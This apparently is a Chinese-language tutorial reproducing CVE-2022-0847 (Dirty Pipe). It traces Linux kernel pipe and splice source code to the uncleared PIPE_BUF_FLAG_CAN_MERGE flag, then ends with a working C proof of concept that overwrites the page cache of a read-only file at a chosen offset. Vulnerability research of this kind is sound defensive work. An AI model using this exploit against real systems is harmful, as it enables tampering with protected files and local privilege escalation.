CVE-2022-0847漏洞复现

page cache

首先取自linux官方文档对于page cache的解释

物理内存是易失性的，将数据导入内存的常见情况是从文件中读取数据。每当读取文件时，数据都会放入page cache中，以避免在后续读取时进行昂贵的磁盘访问。同样，当写入文件时，数据被放置在page cache中，并最终进入后备存储设备。写入的页面被标记为脏页面，当 Linux 决定将它们重用于其他目的时，它会确保将设备上的文件内容与更新的数据同步。

pipe系列

在我们申请到一个pipe管道后,他们在内存当中大致呈以下局面

                                                         struct file
                                                     +----------------+
                                                     |                |
                                          +--------->|                |
                                          |          +----------------+
                                          |          | *private_data  +-----------------------------------+
                                          |          |                |                                   |
                                          |          +----------------+                                   |
                                          |     +----+      *f_op     |                                   |
                                          |     |    |                |                                   |
                                          |     |    +----------------+                                   |
     Userland                             |     |    |    *f_inode    +--+                                |     struct pipe_inode_info
                                          |     |    |                |  |                                |
+-----------------+-----------------+     |     |    +----------------+  |    struct inode                |        +------------+
|      fd[0]      |     files[0]    +-----+     |    |                |  +-->+------------+               +------->|            |           +-------------+
|                 |       read      |           |    +----------------+  |   |   *i_op    +----+          |        +------------+      +--->| pipe_buffer |
+-----------------+-----------------+           |                        |   |            |    |          |        |            |      |    +-------------+
|      fd[1]      |     files[1]    +-----+     |                        |   +------------+    |          |        +------------+      |    | pipe_buffer |
|                 |       write     |     |     |        struct file     |   |   ......   |    |          |        |            |      |    +-------------+
+-----------------+-----------------+     |     |    +----------------+  |   |            |    |          |        +------------+      |    | ........... |
                                          +-----|--->|                |  |   +------------+    |          |        |   *bufs    +------+    +-------------+
                                                |    |                |  |   |   i_pipe   +----|----------+        +------------+           | pipe_buffer |
                                                |    +----------------+  |   |            |    |                   |            |           +-------------+
                                                |    | *private_data  |  |   +------------+    |                   +------------+
                                                |    |                |  |   |   ......   |    |                   +------------+
                                                |    +----------------+  |   |            |    |
                                                +----+      *f_op     |  |   +------------+    |
                                                |    |                |  |                     |
                                                |    +----------------+  |                     |            +------------------------------------------------+
                                                |    |    *f_inode    |  |                     |            | const struct file_operations pipefifo_fops = { |
                                                |    |                +--+                     |            |     .open       = fifo_open,                   |
                                                |    +----------------+                        |            |     .llseek     = no_llseek,                   |
                                                |    |                |                        |            |     .read_iter  = pipe_read,                   |
                                                |    +----------------+                  +-----+------------+     .write_iter = pipe_write,                  |
                                                |                                        |                  |     .poll       = pipe_poll,                   |
                                                |                                        |                  |     .unlocked_ioctl = pipe_ioctl,              |
                                                |                                        |                  |     .release    = pipe_release,                |
                                                |                                        |                  |     .fasync     = pipe_fasync,                 |
                                                |                                        |                  |     .splice_write   = iter_file_splice_write,  |
                                                +----------------------------------------+                  | };                                             |
                                                                                                            +------------------------------------------------+

pipe_inode_info

位于 fs/pipe.c

58 struct pipe_inode_info {
59     struct mutex mutex;
60     wait_queue_head_t rd_wait, wr_wait;
61     unsigned int head; 			//写入pipe时所指向的bufs的下标
62     unsigned int tail; 			//读出pipe时所指向的bufs的下标
63     unsigned int max_usage; 	//bufs最多包含的pipe_buffer
64     unsigned int ring_size; 	//目前总共的pipe_buffer数量,默认0x10,可以通过fcntl(F_SETPIPE_SZ)进行修改,但是需为2的幂次
65 #ifdef CONFIG_WATCH_QUEUE
66     bool note_loss;
67 #endif
68     unsigned int nr_accounted; 	
69     unsigned int readers; 		//目前读者数目
70     unsigned int writers; 		//目前写者数目
71     unsigned int files; 		//映射到该pipe_inode_info的file数目
72     unsigned int r_counter;
73     unsigned int w_counter;                                                                         
74     unsigned int poll_usage;
75     struct page *tmp_page;
76     struct fasync_struct *fasync_readers;
77     struct fasync_struct *fasync_writers;
78     struct pipe_buffer *bufs; 	//struct pipe_buffer数组
79     struct user_struct *user; 	//创建该pipe的用户
80 #ifdef CONFIG_WATCH_QUEUE
81     struct watch_queue *watch_queue;
82 #endif
83 };

pipefifo_fops

位于 fs/pipe.c,这里是pipe管道文件对应的虚函数表

1218 const struct file_operations pipefifo_fops = {
1219     .open       = fifo_open,
1220     .llseek     = no_llseek,
1221     .read_iter  = pipe_read,                                                           
1222     .write_iter = pipe_write,
1223     .poll       = pipe_poll,
1224     .unlocked_ioctl = pipe_ioctl,
1225     .release    = pipe_release,
1226     .fasync     = pipe_fasync,
1227     .splice_write   = iter_file_splice_write,
1228 };

pipe_write

一步一步分析pipe_write

415 static ssize_t
416 pipe_write(struct kiocb *iocb, struct iov_iter *from)                                  
417 {   
418     struct file *filp = iocb->ki_filp;
419     struct pipe_inode_info *pipe = filp->private_data;
420     unsigned int head;
421     ssize_t ret = 0;
422     size_t total_len = iov_iter_count(from);
423     ssize_t chars;
424     bool was_empty = false;
425     bool wake_next_writer = false;
......
446     /*
447      * If it wasn't empty we try to merge new data into
448      * the last buffer.
449      *
450      * That naturally merges small writes, but it also
451      * page-aligns the rest of the writes for large writes
452      * spanning multiple pages.
453      */
454     head = pipe->head;
455     was_empty = pipe_empty(head, pipe->tail); 	//判断pipe是否现在内容为空
456     chars = total_len & (PAGE_SIZE-1); //total_len为我们想总共写入的字节数
457     if (chars && !was_empty) { 		//当为空就不会走这里,这里是如果本次指向的head还有空闲空间,则会用它来进行写入
458         unsigned int mask = pipe->ring_size - 1; 
459         struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
460         int offset = buf->offset + buf->len; 	//偏移是指该pipe_buffer所指向的page页面中的偏移,这里再加上len就可以得到即将写入的位置
461 
462         if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
463             offset + chars <= PAGE_SIZE) {
464             ret = pipe_buf_confirm(pipe, buf);
465             if (ret)
466                 goto out;
467 
468             ret = copy_page_from_iter(buf->page, offset, chars, from);
469             if (unlikely(ret < chars)) {
470                 ret = -EFAULT;
471                 goto out;
472             }
473 
474             buf->len += ret; 		//这里将len+我们刚刚写入的值
475             if (!iov_iter_count(from))
476                 goto out;
477         }
478     }

简述一下上面的步骤:

检查整个pipe所指向buffer的空间,这里检查我们想要传入的总字节数 total_size,然后计算 chars,这里是总字节相对于pagesize取余数
这里来判断offset + chars会不会超过该head buffer所指向的页面界限,并且判断buf->flags是否带有 PIPE_BUF_FLAG_CAN_MERGE参数,满足两个条件就进行下面buffer的复制

然后如果没有进行一个初始的边角料拷贝,或者说拷完了,下面的代码继续运行,是一个大的for循环

480     for (;;) {
481         if (!pipe->readers) {
482             send_sig(SIGPIPE, current, 0);
483             if (!ret)
484                 ret = -EPIPE;
485             break;
486         }
487 
488         head = pipe->head;
				/* 查看是否bufs是否已经用完,为用完则进入if的内容,否则跳过过 */
489         if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 	
490             unsigned int mask = pipe->ring_size - 1;
491             struct pipe_buffer *buf = &pipe->bufs[head & mask];  //获取写入的bufs数组下标                      
492             struct page *page = pipe->tmp_page;
493             int copied;
494 
495             if (!page) {
496                 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); 	//如果pipe没有cache页面,则分配
497                 if (unlikely(!page)) {
498                     ret = ret ? : -ENOMEM;
499                     break;
500                 }
501                 pipe->tmp_page = page;
502             }
503 
504             /* 在 bufs ring中分配一个slot并且连接在空的pipe_buffer上
505              * If we fault or otherwise fail to use
506              * it, either the reader will consume it or it'll still
507              * be there for the next write.
508              */
509             spin_lock_irq(&pipe->rd_wait.lock);
510 
511             head = pipe->head;
512             if (pipe_full(head, pipe->tail, pipe->max_usage)) {
513                 spin_unlock_irq(&pipe->rd_wait.lock);
514                 continue;
515             }
516 
517             pipe->head = head + 1;
518             spin_unlock_irq(&pipe->rd_wait.lock);
519 
520             /* Insert it into the buffer array */
521             buf = &pipe->bufs[head & mask];
522             buf->page = page;
523             buf->ops = &anon_pipe_buf_ops; 	//pipe_buffer的回调函数
524             buf->offset = 0;
525             buf->len = 0;
526             if (is_packetized(filp)) 		//查看是否设置文件的flags O_DIRECT
527                 buf->flags = PIPE_BUF_FLAG_PACKET;
528             else
529                 buf->flags = PIPE_BUF_FLAG_CAN_MERGE;             //未设置则置该标志位             
530             pipe->tmp_page = NULL;
531 
532             copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
533             if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
534                 if (!ret)
535                     ret = -EFAULT;
536                 break;
537             }
538             ret += copied;
539             buf->offset = 0;
540             buf->len = copied;
541 
542             if (!iov_iter_count(from))
543                 break;
544         }
545 			/* 走到这里说明pipe bufs中的page页面用完了 */
546         if (!pipe_full(head, pipe->tail, pipe->max_usage))
547             continue;
548 
549         /* Wait for buffer space to become available. */
550         if (filp->f_flags & O_NONBLOCK) {
551             if (!ret)
552                 ret = -EAGAIN;
553             break;
554         }
555         if (signal_pending(current)) {
556             if (!ret)
557                 ret = -ERESTARTSYS;
558             break;
559         }
560 
561         /*
562          * We're going to release the pipe lock and wait for more
563          * space. We wake up any readers if necessary, and then
564          * after waiting we need to re-check whether the pipe
565          * become empty while we dropped the lock.
566          */
567         __pipe_unlock(pipe);
568         if (was_empty)
569             wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
570         kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
571         wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
572         __pipe_lock(pipe);
573         was_empty = pipe_empty(pipe->head, pipe->tail);
574         wake_next_writer = true;
575     }
.......

这里的for循环是整个pipe_write部分的核心,他承担了剩下的大部分拷贝,会不断检查pipe->bufs的充盈程度,一旦有空闲则会申请新的page来拷贝我们用户区传入的数据,这里如果我们创建pipe的时候没有设置标识 O_DIRECT,则会在每个新创建的pipe_buffer->flags置为 PIPE_BUF_FLAG_CAN_MERGE

pipe_read

pipe_read函数大部分就是从上述的环形buffer当中读出数据,然后修改pipe_buffer以及 pipe_inode_info 相对应的部分,值得注意的一点就是其中对于读出完毕的pipe_buffer的flags字段并没有修改,所以当我们pipe_write之后,buf->flags中始终会有该标识位 PIPE_BUF_FLAG_CAN_MERGE

splice系统调用

先看看手册中的描述

splice()  moves  data  between  two file descriptors without copying between kernel address space and user address space.  It transfers up to len bytes of data from the file descriptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.

大致意思是该系统调用将使得两个文件描述符之间的数据复制并不是内核与用户空间这种形式.她至多可以从 fd_in文件描述符当中复制大小为 len的数据至 fd_out,值得注意的是这两个文件描述符中至少需要引用了管道

/* 这里有几条规则是传入参数需要遵守的
 * 1.如果fd_in为pipe,则off_in必须要是NULL;
 * 2.如果fd_in不是pipe,且off_in是NULL,读取字节将会从file offset开始,读取完毕后进行适当的设置
 * 3.如果fd_in不是pipe,且off_in非空,则off_in必须指向一个buffer,该buffer需要满足从开始的偏移到即将从fd_in读入的字节数大小,这样的话fd_in的file offset将不会改变
 * ?.上述的fd_in与off_in的规则同样作用于fd_out与off_out
*/
ssize_t splice(int fd_in, off_t *_Nullable off_in,
                      int fd_out, off_t *_Nullable off_out,
                      size_t len, unsigned int flags);

似乎是由九种传参组合

fd_in	off_in	fd_out	off_out	Right/Wrong
pipe	NULL	pipe	NULL	:white_check_mark:
pipe	NULL	file	NULL	:white_check_mark:
pipe	NULL	file	buffer	:white_check_mark:
file	NULL	pipe	NULL	:white_check_mark:
file	NULL	file	NULL	:x:
file	NULL	file	buffer	:x:
file	buffer	pipe	NULL	:white_check_mark:
file	buffer	file	NULL	:x:
file	buffer	file	buffer	:x:

由于有着至少一个pipe的规定,所以最终能正确执行的就只有五种情况

然后我们来看系统调用源码

1332 SYSCALL_DEFINE6(splice, int, fd_in, loff_t __user *, off_in,
1333         int, fd_out, loff_t __user *, off_out,
1334         size_t, len, unsigned int, flags)
1335 {
1336     struct fd in, out;
1337     long error;
1338 
1339     if (unlikely(!len))
1340         return 0;
1341 
1342     if (unlikely(flags & ~SPLICE_F_ALL))
1343         return -EINVAL;
1344 
1345     error = -EBADF;
1346     in = fdget(fd_in); 	
1347     if (in.file) {
1348         out = fdget(fd_out);
1349         if (out.file) {
1350             error = __do_splice(in.file, off_in, out.file, off_out,
1351                         len, flags);
1352             fdput(out);
1353         }
1354         fdput(in);
1355     }
1356     return error;
1357 }

基本没有什么好说的,直接看 __do_splice

1116 static long __do_splice(struct file *in, loff_t __user *off_in,
1117             struct file *out, loff_t __user *off_out,
1118             size_t len, unsigned int flags)
1119 {
1120     struct pipe_inode_info *ipipe;
1121     struct pipe_inode_info *opipe;
1122     loff_t offset, *__off_in = NULL, *__off_out = NULL;
1123     long ret;
1124 
1125     ipipe = get_pipe_info(in, true);
1126     opipe = get_pipe_info(out, true);
1127 
1128     if (ipipe && off_in)
1129         return -ESPIPE;
1130     if (opipe && off_out)
1131         return -ESPIPE;
1132 	 /* 由上面的规律统计可知,这里我们至多只会有一个off_*非空,所以不用担心重写入的问题 */
1133     if (off_out) {
1134         if (copy_from_user(&offset, off_out, sizeof(loff_t))) 	//从用户off_out拷贝数据到&offset
1135             return -EFAULT;
1136         __off_out = &offset;
1137     }
1138     if (off_in) {
1139         if (copy_from_user(&offset, off_in, sizeof(loff_t))) 	//从用户off_in拷贝数据到&offset
1140             return -EFAULT;                                                                                                                                                             
1141         __off_in = &offset;
1142     }
1143 	 /* 这里传入的__off_in和__off_out至多只会有一个指针非空 */
1144     ret = do_splice(in, __off_in, out, __off_out, len, flags);
1145     if (ret < 0)
1146         return ret;
1147 
1148     if (__off_out && copy_to_user(off_out, __off_out, sizeof(loff_t)))
1149         return -EFAULT;
1150     if (__off_in && copy_to_user(off_in, __off_in, sizeof(loff_t)))
1151         return -EFAULT;
1152 
1153     return ret;
1154 }

这里仅仅也只是判断了一下你传递的参数的正确性,然后如果某个off_*不为空,则需要将其拷贝到内核空间 :)

do_splice

然后调用 do_splice函数,该函数比较长,因此我们分开讲解,这里首先分成几种情况,分别是:

in和out均为pipe
in为pipe,out为普通文件
in为普通文件,out为pipe

1025 /*      
1026  * Determine where to splice to/from.
1027  */ 
1028 long do_splice(struct file *in, loff_t *off_in, struct file *out,
1029            loff_t *off_out, size_t len, unsigned int flags)
1030 {
1031     struct pipe_inode_info *ipipe;
1032     struct pipe_inode_info *opipe;
1033     loff_t offset;
1034     long ret;
1035 
1036     if (unlikely(!(in->f_mode & FMODE_READ) ||
1037              !(out->f_mode & FMODE_WRITE)))
1038         return -EBADF;
1039 
1040     ipipe = get_pipe_info(in, true);
1041     opipe = get_pipe_info(out, true);
1042 	 /* 如果in和out都是pipe */
1043     if (ipipe && opipe) {
1044         if (off_in || off_out) 	//二段检查
1045             return -ESPIPE;
1046 
1047         /* 如果说我们使用pipe的读写文件描述符们来调用splice可能是十分有趣的, 但是就不准就不准就不准 :) */
1048         if (ipipe == opipe)
1049             return -EINVAL;
1050 
1051         if ((in->f_flags | out->f_flags) & O_NONBLOCK)
1052             flags |= SPLICE_F_NONBLOCK;
1053 
1054         return splice_pipe_to_pipe(ipipe, opipe, len, flags);
1055     }
    	......

:one: pipe_to_pipe

可以看到上面的do_splice函数碰到两个pipe,则会调用 splice_pipe_to_pipe函数,该函数主要是复制了pipe_buffer,将inpipe的pipe_buffer内容复制给了outpipe的pipe_buffer,

1434 /* 
1435  * Splice contents of ipipe to opipe.
1436  */
1437 static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
1438                    struct pipe_inode_info *opipe,
1439                    size_t len, unsigned int flags)
1440 {
1441     struct pipe_buffer *ibuf, *obuf;
1442     unsigned int i_head, o_head;
1443     unsigned int i_tail, o_tail;
1444     unsigned int i_mask, o_mask;
1445     int ret = 0;
1446     bool input_wakeup = false;
		 .......
1511         ibuf = &ipipe->bufs[i_tail & i_mask];
1512         obuf = &opipe->bufs[o_head & o_mask];
1513 
1514         if (len >= ibuf->len) {
1515             /*
1516              * Simply move the whole buffer from ipipe to opipe
1517              */
1518             *obuf = *ibuf;
1519             ibuf->ops = NULL;
1520             i_tail++;
1521             ipipe->tail = i_tail;
1522             input_wakeup = true;
1523             o_len = obuf->len;
1524             o_head++;
1525             opipe->head = o_head;
1526         } else {
1527             /*
1528              * Get a reference to this pipe buffer,
1529              * so we can copy the contents over.
1530              */
1531             if (!pipe_buf_get(ipipe, ibuf)) {
1532                 if (ret == 0)
1533                     ret = -EFAULT;
1534                 break;
1535             }
1536             *obuf = *ibuf;
       	 	 ......

这里我们返回到do_splice,说下一个if判断

注意这里是 do_splice剩下的部分代码,

1057     if (ipipe) {
1058         if (off_in)
1059             return -ESPIPE;
1060         if (off_out) {
1061             if (!(out->f_mode & FMODE_PWRITE))
1062                 return -EINVAL;
1063             offset = *off_out;
1064         } else {
1065             offset = out->f_pos;
1066         }
1067 
1068         if (unlikely(out->f_flags & O_APPEND))
1069             return -EINVAL;
1070 
1071         ret = rw_verify_area(WRITE, out, &offset, len); 	//查看是否越界
1072         if (unlikely(ret < 0))
1073             return ret;
1074 
1075         if (in->f_flags & O_NONBLOCK)
1076             flags |= SPLICE_F_NONBLOCK;
1077 
1078         file_start_write(out);
1079         ret = do_splice_from(ipipe, out, &offset, len, flags);
1080         file_end_write(out);
1081 
1082         if (!off_out)
1083             out->f_pos = offset;
1084         else
1085             *off_out = offset;
1086 
1087         return ret;                                                                                                                                                                     
1088     }

:two: pipe_to_file

然后我们查看do_splice_from函数,这是第二种情况的判断

762 static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,                                
763                loff_t *ppos, size_t len, unsigned int flags)
764 {   
765     if (unlikely(!out->f_op->splice_write))
766         return warn_unsupported(out, "write");
767     return out->f_op->splice_write(pipe, out, ppos, len, flags);
768 }

这里调用到splice_write函数,他在普通文件当中的初始化函数指针指向iter_file_splice_write,大意是将ipipe的即将复制pipe_buffer中指向的page页指针赋值给一个bio_vec数组,他的结构如下:

32 struct bio_vec {                                                                                           
33     struct page *bv_page;
34     unsigned int    bv_len;
35     unsigned int    bv_offset;
36 };

然后之后调用vfs_iter_write写入文件buffer

:three: file_to_pipe

然后是最后一部分的do_splice,也是咱们本次漏洞的重点

 if (opipe) {
1091         if (off_out)
1092             return -ESPIPE;
1093         if (off_in) {
1094             if (!(in->f_mode & FMODE_PREAD))
1095                 return -EINVAL;
1096             offset = *off_in;
1097         } else {
1098             offset = in->f_pos;
1099         }
1100 
1101         if (out->f_flags & O_NONBLOCK)
1102             flags |= SPLICE_F_NONBLOCK;
1103 
1104         ret = splice_file_to_pipe(in, opipe, &offset, len, flags);
1105         if (!off_in)
1106             in->f_pos = offset;
1107         else
1108             *off_in = offset;
1109 
1110         return ret;
1111     }
1112 
1113     return -EINVAL;
1114 }

直接查看splice_file_to_pipe 调用链,这里有个小知识那就是我们要知道某个文件的ops,我们可以直接去查看<name>_file_operations,其中<name>为我们的文件系统名称,例如ext4等等

splice_file_to_pipe
	do_splice_to
		in->f_op->splice_read <==> generic_file_splice_read
			call_read_iter
				in->f_op->read_iter <==> generic_file_read_iter

好我们链条就先到这里,先查看该函数,下面是内核开发者对该函数作出的解释

This is the “read_iter()” routine for all filesystems that can use the page cache directly.

2772 generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)
2773 {
2774     size_t count = iov_iter_count(iter); 	//返回iter->count,也就是我们复制的字节数
2775     ssize_t retval = 0;
2776 
2777     if (!count)
2778         return 0; /* skip atime */
2779 
2780     if (iocb->ki_flags & IOCB_DIRECT) { 	//看是否文件标识带有O_DIRECT,若有该标识,则绕过cache
2781         struct file *file = iocb->ki_filp;
2782         struct address_space *mapping = file->f_mapping;
2783         struct inode *inode = mapping->host;
2784 
2785         if (iocb->ki_flags & IOCB_NOWAIT) {
2786             if (filemap_range_needs_writeback(mapping, iocb->ki_pos,
2787                         iocb->ki_pos + count - 1))
2788                 return -EAGAIN;
2789         } else {
2790             retval = filemap_write_and_wait_range(mapping,
2791                         iocb->ki_pos,
2792                             iocb->ki_pos + count - 1);
2793             if (retval < 0)
2794                 return retval;
2795         }
2796 
2797         file_accessed(file);
2798 
2799         retval = mapping->a_ops->direct_IO(iocb, iter);
2800         if (retval >= 0) {
2801             iocb->ki_pos += retval;
2802             count -= retval;
2803         }
2804         if (retval != -EIOCBQUEUED)
2805             iov_iter_revert(iter, count - iov_iter_count(iter));
2806 
2807         /*
2808          * Btrfs can have a short DIO read if we encounter
2809          * compressed extents, so if there was an error, or if
2810          * we've already read everything we wanted to, or if
2811          * there was a short read because we hit EOF, go ahead
2812          * and return.  Otherwise fallthrough to buffered io for
2813          * the rest of the read.  Buffered reads will not work for
2814          * DAX files, so don't bother trying.
2815          */
2816         if (retval < 0 || !count || IS_DAX(inode))
2817             return retval;
2818         if (iocb->ki_pos >= i_size_read(inode))
2819             return retval;
2820     }
2821 
2822     return filemap_read(iocb, iter, retval);
2823 }
2824 EXPORT_SYMBOL(generic_file_read_iter);

其中涉及到两个中间变量 iocb和iter,他们两个是在generic_file_splice_read当中进行初始化的,下面分别给出初始化步骤:

iter
iocb

然后我们看到最后调用filemap_read

2642 ssize_t filemap_read(struct kiocb *iocb, struct iov_iter *iter,
2643         ssize_t already_read)
2644 {
2645     struct file *filp = iocb->ki_filp; 	//获取in_file文件
2646     struct file_ra_state *ra = &filp->f_ra;
2647     struct address_space *mapping = filp->f_mapping; //查看文件映射部分
2648     struct inode *inode = mapping->host; 	//获取in_file对应的inode
2649     struct folio_batch fbatch;
2650     int i, error = 0;
2651     bool writably_mapped;
2652     loff_t isize, end_offset;
2653 
		 ...
2661 
2662     do {
2663         cond_resched();
2664 
2665         /*
2666          * If we've already successfully copied some data, then we
2667          * can no longer safely return -EIOCBQUEUED. Hence mark
2668          * an async read NOWAIT at that point.第一次already_read=0
2669          */
2670         if ((iocb->ki_flags & IOCB_WAITQ) && already_read)
2671             iocb->ki_flags |= IOCB_NOWAIT;
2672 
2673         if (unlikely(iocb->ki_pos >= i_size_read(inode)))
2674             break;
2675 
2676         error = filemap_get_pages(iocb, iter, &fbatch);
 			 ...
2727             copied = copy_folio_to_iter(folio, offset, bytes, iter);
2728 
2729             already_read += copied;
2730             iocb->ki_pos += copied;
2731             ra->prev_pos = iocb->ki_pos;
2732 
			 ...
2743 
2744     file_accessed(filp);
2745 
2746     return already_read ? already_read : error;
2747 }
2748 EXPORT_SYMBOL_GPL(filemap_read);

在该函数当中,我们会将数据从page cache复制到管道,这里并没有真正的进行逐字节复制.在一个dowhile的大循环当中,主要通过调用copy_folio_to_iter来复制chunks

这里给出folio发布的官方解释,这样看来folio似乎是一个用来给复合页机制带来的歧义提供的解决办法,但我看到后面似乎并不受欢迎,但是由于现在替代方案较少,所以暂时将就着用吧:)

可以得出一个结论,我们在这里可以大致将folio类比为page,这对我们接下来的理解并没有任何影响,而copy_folio_to_iter实际上也仅仅是调用了copy_page_to_iter

我们来查看copy_page_to_iter函数调用链,根据文件的类型会有以下的情况

1
2
3

copy_page_to_iter
	__copy_page_to_iter
		copy_page_to_iter_pipe

382 static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
383              struct iov_iter *i)
384 {
385     struct pipe_inode_info *pipe = i->pipe;
386     struct pipe_buffer *buf;
387     unsigned int p_tail = pipe->tail;
388     unsigned int p_mask = pipe->ring_size - 1;
389     unsigned int i_head = i->head;
390     size_t off;
391 
392     if (unlikely(bytes > i->count))
393         bytes = i->count;
394 
395     if (unlikely(!bytes))
396         return 0;
397 
398     if (!sanity(i))
399         return 0;
400 
401     off = i->iov_offset;
402     buf = &pipe->bufs[i_head & p_mask]; 	//获取pipe的head指向的pipe_buffer
403     if (off) {
404         if (offset == off && buf->page == page) {
405             /* merge with the last one */
406             buf->len += bytes;
407             i->iov_offset += bytes;
408             goto out;
409         }
410         i_head++;
411         buf = &pipe->bufs[i_head & p_mask];
412     }
413     if (pipe_full(i_head, p_tail, pipe->max_usage))
414         return 0;
415 
416     buf->ops = &page_cache_pipe_buf_ops;
417     //     buf->flags = 0;             这里需要我们手动将该行注释掉,然后再编译内核
418     get_page(page);
419     buf->page = page;
420     buf->offset = offset;
421     buf->len = bytes;
422 
423     pipe->head = i_head + 1;
424     i->iov_offset = offset + bytes;
425     i->head = i_head;
426 out:
427     i->count -= bytes;
428     return bytes;                
429 }

我们可以看到这里并没有发生实际上的数据拷贝,而仅仅是page页面指针的改写,当文章写到这里我发现5.17.9的linux内核此时已经将该漏洞进行修复,所以这里我手动将其恢复到漏洞版本

漏洞利用

我们现在知道了漏洞点,那就是在我们使用splice系统调用来进行零拷贝时,从file拷贝到pipe其中的一个buff中时并没有修改其中的标识位,也就是pipe_buffer->flag位,
此时如果flag位存在PIPE_BUF_FLAG_CAN_MERGE,那么我们下次在写入该buffer的时候将从该pipe_buffer的offset+len开始写,但是此时注意,经过splice的零拷贝,我们的pipe_buffer是指向的pagecache的,所以这里导致我们可以直接修改pagecache当中的页面,且根本不会去考虑是否为可写,

所以本次漏洞利用分为以下几个步骤:

分配pipe以及其中的buffer
首先向其中灌入大量无意义数据,再依次排空,由于读并不会修改我们的标识,所以这样使得我们每个pipe_buffer都会带有PIPE_BUF_FLAG_CAN_MERGE标识
splice系统调用,将不可写的文件数据内容”拷贝”到pipe当中
我们将对于pipe的写转化为了对于不可写文件所映射到的pagecache的写

下面是漏洞的poc以及演示

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000

void initial_pipe(int *my_pipe);
void fill_pipe(int *my_pipe);
void drain_pipe(int *my_pipe);
void free_env(int *my_pipe);

void debug(){
    printf("[\033[5;33m!\033[0m]\033[32mDebugging Here\033[0m\n");
    getchar();
}

int main(int argc, char ** argv)
{
    int my_pipe[2] = {0};
    int fd_read = 0;
    char buf[0x10] = {'\x00'};
    struct stat file_st;
    uint64_t offset = 0;

    if(argc < 4){
        printf("[x]The poc's right use is: \n<our_poc> <vuln_file> <offset> <payload>\n");
        puts("[?]len < 0 will read the hole file...");
        exit(1);
    }
    puts("[+]Initial the pipe...");
    initial_pipe(my_pipe);

    puts("[+]Fill the pipe...");
    fill_pipe(my_pipe);

    puts("[+]drain the pipe...");
    drain_pipe(my_pipe);
    
    fd_read = open(argv[1], O_RDONLY);
    
    if(fd_read < 0){
       perror("open vuln file failed!");
       exit(1);
    }
    if(fstat(fd_read, &file_st) < 0){
        perror("stat file failed!");
        exit(1);
    }

    if(argv[2] > 0)
        offset = atoi(argv[2]);
    else
        offset = file_st.st_size; 
    printf("%d\n", offset);
    if(splice(fd_read, (uint64_t *)&offset, my_pipe[1], NULL, 1, 0) < 0){
        perror("splice fd to pipe");
        exit(1);
    }
    puts("[+]We successfully execute the splice...");
    if(write(my_pipe[1], argv[3], sizeof(argv[3])) < 0){
        perror("write failed");
        exit(1);
    }

    free_env(my_pipe);
    close(fd_read);
    return 0;
}


void initial_pipe(int *my_pipe){
    pipe(my_pipe);
    fcntl(my_pipe[1], F_SETPIPE_SZ, 1*PAGE_SIZE); 
}

void fill_pipe(int *my_pipe){
    int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);
    int nr = 0;
    printf("[*]pipe_size is %d\n", pipe_size);
    char buffer[PAGE_SIZE] = {0};
    memset(buffer, 0x41, sizeof(buffer));
    for(;pipe_size > 0; pipe_size -= nr)
        nr = write(my_pipe[1], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size));
    printf("[*]Fill the pipe done...\n");
}

void drain_pipe(int *my_pipe){
    int pipe_size = fcntl(my_pipe[1], F_GETPIPE_SZ);
    int nr = 0;
    printf("[*]pipe_size is %d\n", pipe_size);
    char buffer[PAGE_SIZE] = {0};
    for(;pipe_size > 0; pipe_size -= nr)
        nr = read(my_pipe[0], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size));
    printf("[*]Drain the pipe done...\n");
}

void free_env(int *pipe){
    /* 1. Free the pipe */
    close(pipe[0]);
    close(pipe[1]);
}